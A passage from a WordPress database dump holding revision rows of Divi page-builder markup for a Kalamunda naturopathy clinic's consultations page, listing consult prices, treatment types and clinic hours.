type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 20:36:48','2021-05-25 12:36:48','',28,'https://verde.desidrivers.com.au/?p=141',0,'revision','',0),(137,1,'2021-05-25 20:25:23','2021-05-25 12:25:23','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 20:25:23','2021-05-25 12:25:23','',28,'https://verde.desidrivers.com.au/?p=137',0,'revision','',0),(135,1,'2021-05-25 20:23:16','2021-05-25 12:23:16','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" 